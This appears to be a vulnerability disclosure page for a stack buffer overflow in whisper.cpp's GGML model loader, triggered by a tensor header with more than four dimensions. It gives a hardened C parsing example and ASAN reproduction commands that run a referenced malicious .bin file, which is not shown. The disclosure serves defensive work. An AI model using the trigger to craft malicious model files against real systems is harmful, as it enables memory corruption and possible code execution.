Rammadaeus
Add PoC and reproduction instructions
86d6533 verified

PoC: Stack Buffer Overflow in whisper.cpp GGML Parser

Format: GGML (.bin)
Target: whisper.cpp (ggml-org/whisper.cpp)
CWE: CWE-121 (Stack-based Buffer Overflow)

Vulnerability

Stack buffer overflow caused by an unchecked n_dims value during tensor loading. A tensor header with n_dims > 4 makes the loader write attacker-controlled values past the end of the ne[4] stack array. Potential RCE.
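The fix is to bound n_dims before it is used as a loop limit over ne[]. The following is an added illustration, not code from whisper.cpp or from this PoC: it parses a simplified, assumed tensor-dimension header (an int32 n_dims followed by n_dims int32 sizes, little-endian) and rejects headers that would overrun the fixed-size array, including truncated input and non-positive sizes.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define GGML_MAX_DIMS 4   /* size of the ne[] array the loader fills */

/* Little-endian int32 read with an explicit length check; returns 0 on a
 * short read so a truncated header is treated as malformed, not as zeros. */
static int read_i32_le(const uint8_t *buf, size_t len, size_t *pos, int32_t *out) {
    if (len - *pos < 4) return 0;
    const uint8_t *b = buf + *pos;
    *out = (int32_t)((uint32_t)b[0] | (uint32_t)b[1] << 8 |
                     (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24);
    *pos += 4;
    return 1;
}

/* Hardened parse of the assumed header layout. Returns n_dims on success,
 * 0 if the header is malformed. The n_dims range check is the one that the
 * vulnerable loader lacks; the ne[i] > 0 check is an extra sanity guard. */
int parse_tensor_dims(const uint8_t *buf, size_t len, int32_t ne[GGML_MAX_DIMS]) {
    size_t pos = 0;
    int32_t n_dims;
    if (!read_i32_le(buf, len, &pos, &n_dims)) return 0;
    if (n_dims < 1 || n_dims > GGML_MAX_DIMS) return 0;   /* bound before use */
    for (int i = 0; i < GGML_MAX_DIMS; i++) ne[i] = 1;
    for (int32_t i = 0; i < n_dims; i++) {
        if (!read_i32_le(buf, len, &pos, &ne[i])) return 0;
        if (ne[i] <= 0) return 0;
    }
    return n_dims;
}

/* Convenience wrapper used by the demonstration below. */
int dims_of(const uint8_t *buf, size_t len) {
    int32_t ne[GGML_MAX_DIMS];
    return parse_tensor_dims(buf, len, ne);
}

/* Constructed sample headers (hypothetical values, not from any real model). */
static const uint8_t kGoodHeader[]  = {2,0,0,0, 80,0,0,0, 3,0,0,0};     /* 2 dims: 80 x 3 */
static const uint8_t kOversized[]   = {8,0,0,0, 1,0,0,0, 1,0,0,0, 1,0,0,0, 1,0,0,0,
                                       1,0,0,0, 1,0,0,0, 1,0,0,0, 1,0,0,0}; /* n_dims = 8 */
static const uint8_t kTruncated[]   = {2,0,0,0, 80,0,0,0};              /* missing ne[1] */

int main(void) {
    printf("good: %d\n", dims_of(kGoodHeader, sizeof kGoodHeader));   /* 2 */
    printf("oversized: %d\n", dims_of(kOversized, sizeof kOversized)); /* 0 */
    printf("truncated: %d\n", dims_of(kTruncated, sizeof kTruncated)); /* 0 */
    return 0;
}
```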

Reproduction

git clone https://github.com/ggml-org/whisper.cpp && cd whisper.cpp
mkdir build-asan && cd build-asan
cmake .. -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address,undefined"
make -j$(nproc)
./bin/whisper-cli -m ../poc_stack_overflow.bin -f /dev/null

ASAN reports: stack-buffer-overflow WRITE at whisper.cpp:1885

Tested: whisper.cpp commit 364c77f4